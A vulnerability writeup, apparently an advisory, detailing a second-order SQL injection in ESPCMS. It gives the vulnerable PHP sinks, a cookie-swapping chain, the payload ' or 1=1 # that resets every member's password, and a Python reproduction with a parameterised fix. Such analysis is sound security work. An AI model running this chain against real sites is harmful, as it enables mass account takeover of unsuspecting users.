1. Second-order injection via $alias to control SQL

The user nickname $alias is read back from the database and reused without being escaped.

File: interface/member.php

    $db_sql = "SELECT * FROM $db_table WHERE $db_where";
    $rsMember = $this->db->fetch_first($db_sql);
    if (!$rsMember) {
        ...
    }
    ...
    $this->fun->setcookie('ecisp_member_info', $this->fun->eccode("$memberread[userid]|$memberread[alias]|$memberread[integral]|$memberread[mcid]|$memberread[email]|$memberread[lastip]|$ipadd|" . md5($_SERVER['HTTP_USER_AGENT']) . '|' . md5(admin_ClassURL), 'ENCODE', db_pscode));
    // $memberread[alias] comes straight from the database with no addcslashes, so a nickname saved earlier can carry a second-order injection payload

Although the cookie is encrypted with a server-side key (db_pscode) and cannot be forged directly, $alias is attacker-controlled and is embedded in the plaintext, so the decrypted value can carry arbitrary SQL fragments for injection.
2. Injection via $this->ec_member_username

File: public/class_connector.php

    $this->ec_member_username = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);

$this->ec_member_username is the decrypted value of the ecisp_member_username cookie. Using technique 1 the attacker controls its contents, and because the value is produced by eccode DECODE rather than taken from the request directly, magic_quotes_gpc does not apply and single quotes survive intact.

Now look for the places that use $this->ec_member_username.

For example, the password change in interface/membermain.php:

    $db_where = "userid=$this->ec_member_username_id AND username='$this->ec_member_username' AND password='$oldpassword'";
    $db_sql = "SELECT * FROM $db_table WHERE $db_where";
    $rsMember = $this->db->fetch_first($db_sql);
    if (!$rsMember) {
        $linkURL = $this->mlink['memedit_password'];
        $this->callmessage($this->lng['password_input_err'], $linkURL, $this->lng['gobackbotton']);
    } else {
        $db_set = "password='$password'";
        $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
        ...
    }

$this->ec_member_username is concatenated into $db_where and reaches both the SELECT and the UPDATE unescaped, so it can be used for injection.
3. Exploitation

Combining 1 and 2 gives a complete injection chain:

Login => edit profile (store the injection payload in the nickname) => log out => log in again (the payload is now inside the ecisp_member_info cookie) => copy the ecisp_member_info cookie value into ecisp_member_username => change password => SQL injection

For example, to change the password of every member:

Enter ' or 1=1 # in the nickname field of the profile edit page, log out and log in again, then replace the value of the ecisp_member_username cookie with the value of ecisp_member_info.

Submit the password change with a new password that differs from the old one. The SQL executed is:

    UPDATE espcms_member SET password='99754106633f94d350db34d548d6091a' WHERE userid=1 AND username='1|' or 1=1 #|0|1|fuckss@163.com|2130706433|2130706433|fed0b5cf0dbbcab3431bf3bb8fe88349|1002de5fc95a1b716a2e04ab8d78bf76' AND password='1223b8c30a347321299611f873b449ad'

Everything after # is a MySQL comment, so the WHERE clause reduces to userid=1 AND username='1|' or 1=1, which matches every row, and every member's password is replaced.
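The chain above, reproduced end to end as an added example (this is not ESPCMS code and not from the original writeup). It assumes: sqlite3 in place of MySQL, so the payload comments with `--` where the page uses `#`; three constructed member rows with the attacker as userid 1; and the eccode ENCODE/DECODE round trip modelled as identity, since the only property the attack relies on is that both cookies are encrypted with the same server key. The vulnerable password change mirrors the string interpolation in membermain.php, and a parameterised version is run beside it to show that the swapped cookie then matches no row.

```python
import hashlib
import sqlite3


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


# Constructed sample data: the attacker owns userid 1, the other two are victims.
# Columns: userid, username, password, alias, integral, mcid, email, lastip
MEMBERS = [
    (1, "attacker", md5("oldpass"), "attacker", 0, 1, "attacker@example.com", 2130706433),
    (2, "bob", md5("bob-pass"), "bob", 10, 1, "bob@example.com", 2130706433),
    (3, "carol", md5("carol-pass"), "carol", 5, 1, "carol@example.com", 2130706433),
]


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE espcms_member (userid INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, alias TEXT, integral INTEGER, mcid INTEGER, email TEXT, lastip INTEGER)"
    )
    conn.executemany("INSERT INTO espcms_member VALUES (?,?,?,?,?,?,?,?)", MEMBERS)
    conn.commit()
    return conn


def build_member_info(row, ipadd="127.0.0.1", ua="Mozilla/5.0", class_url="/index.php") -> str:
    """Plaintext that member.php pipes together before eccode ENCODE.

    alias is the second field and is joined in verbatim (no addcslashes).
    """
    userid, alias, integral, mcid, email, lastip = row
    return f"{userid}|{alias}|{integral}|{mcid}|{email}|{lastip}|{ipadd}|{md5(ua)}|{md5(class_url)}"


def change_password_vulnerable(conn, userid, ec_member_username, oldpassword, password) -> str:
    """Mirrors membermain.php: the cookie-derived username is interpolated into SQL."""
    db_where = f"userid={userid} AND username='{ec_member_username}' AND password='{oldpassword}'"
    conn.execute(f"UPDATE espcms_member SET password='{password}' WHERE {db_where}")
    conn.commit()
    return db_where


def change_password_fixed(conn, userid, ec_member_username, oldpassword, password) -> int:
    """Hardened form: bound parameters, so the cookie value is only ever data."""
    cur = conn.execute(
        "UPDATE espcms_member SET password=? WHERE userid=? AND username=? AND password=?",
        (password, userid, ec_member_username, oldpassword),
    )
    conn.commit()
    return cur.rowcount


def passwords(conn) -> list:
    return [r[0] for r in conn.execute("SELECT password FROM espcms_member ORDER BY userid")]


def run_chain(fixed: bool = False) -> list:
    """Login -> edit nickname -> re-login -> swap cookies -> change password."""
    conn = setup_db()
    # Step 1: the profile edit stores the payload. The write itself is escaped
    # (parameterised here), which is why the bug is second-order: the payload is
    # inert on the way in and only becomes live when read back out.
    # SQLite comments with '--' where MySQL accepts '#'.
    payload = "' OR 1=1 -- "
    conn.execute("UPDATE espcms_member SET alias=? WHERE userid=1", (payload,))
    # Step 2: re-login reads the row back and builds the ecisp_member_info plaintext.
    row = conn.execute(
        "SELECT userid, alias, integral, mcid, email, lastip FROM espcms_member WHERE userid=1"
    ).fetchone()
    member_info = build_member_info(row)
    # Step 3: the attacker copies ecisp_member_info into ecisp_member_username.
    # Both cookies are eccode'd with the same server key, so DECODE of the swapped
    # cookie yields the member_info plaintext; the symmetric cipher is modelled
    # as identity here (assumption).
    ec_member_username = member_info
    # Step 4: the password change interpolates (vulnerable) or binds (fixed) that value.
    new_hash = md5("newpass")
    if fixed:
        change_password_fixed(conn, 1, ec_member_username, md5("oldpass"), new_hash)
    else:
        change_password_vulnerable(conn, 1, ec_member_username, md5("oldpass"), new_hash)
    return passwords(conn)


if __name__ == "__main__":
    print("vulnerable:", run_chain())
    print("fixed:     ", run_chain(fixed=True))
```

In the vulnerable run the WHERE clause collapses to userid=1 AND username='1|' OR 1=1 followed by a comment, so all three password hashes become md5("newpass"); in the fixed run the bound username is the whole pipe-delimited string, no row matches and nothing changes. Parameter binding removes the sink, but the page's own observation still stands: the alias should also be escaped (addcslashes) before it is embedded in the cookie, and a cookie should never be trusted to carry a different cookie's content.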